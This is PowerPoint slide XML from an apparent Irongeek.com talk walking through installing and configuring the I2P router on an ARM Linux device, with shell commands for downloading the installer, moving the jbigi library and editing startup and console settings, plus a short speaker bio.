                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> i2pbin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cd i2pbin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> the installer Jar (Check their site for updates):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> http://mirror.i2p2.de/i2pinstall_0.9.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>jar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Run the installer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>java -cacao -jar i2pinstall_0.9.jar -console</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35025056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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jbigi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Library</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This set of steps may not be needed later:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>unpackedjar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mv lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>jbigi.jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> ~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>unpackedjar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cd ~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>unpackedjar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>unzip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>jbigi.jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mv libjbigi-linux-armv5.so ~/i2pbin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>libjbigi.so</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1479935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the I2P Run Script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Edit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>runplain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> script:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>~/i2pbin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>runplain.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then edit the "JAVAOPTS" line by adding the -cacao option:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>JAVAOPTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="-cacao -Djava.net.preferIPv4Stack=${PREFERv4} -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Djava.library.path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=${I2P}:${I2P}/lib -Di2p.dir.base=${I2P} -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>DloggerFilenameOverride</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=logs/log-router-@.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20338638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sz="2400" dirty="0" smtClean="0"/>
              <a:t>I run Irongeek.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>I have an interest in InfoSec education</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>I don’t know everything - I’m just a geek with time on my hands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>I’m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>an (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Ir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)regular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>on the InfoSec Daily Podcast: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>isdpodcast.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Sr. Information Security Engineer at a Fortune </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1000</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Pen-testing &amp; Managed Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Co-Founder of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Derbycon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.derbycon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="1143000"/>
            <a:ext cx="2739917" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Twitter: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Irongeek_ADC</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54840" y="1752600"/>
            <a:ext cx="825435" cy="6603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24800" y="5257800"/>
            <a:ext cx="825435" cy="660348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="InnovationDelivered_Blu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4038600"/>
            <a:ext cx="4038600" cy="110143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and Stop I2P</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We need to get an I2P profile to edit, so we run I2P for the first time:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>runplain.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then we kill it dead:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>kill -9 `cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>router.pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now for some edits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42942740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some settings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit ~/.i2p/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clients.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and look for a line that looks like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>clientApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.0.args=7657 ::1,127.0.0.1 ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>webapps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Comment it out with a # and uncomment the line that looks like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>clientApp.0.args=7657 0.0.0.0 ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>webapps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to:</a:t>
            </a:r>
            <a:br>
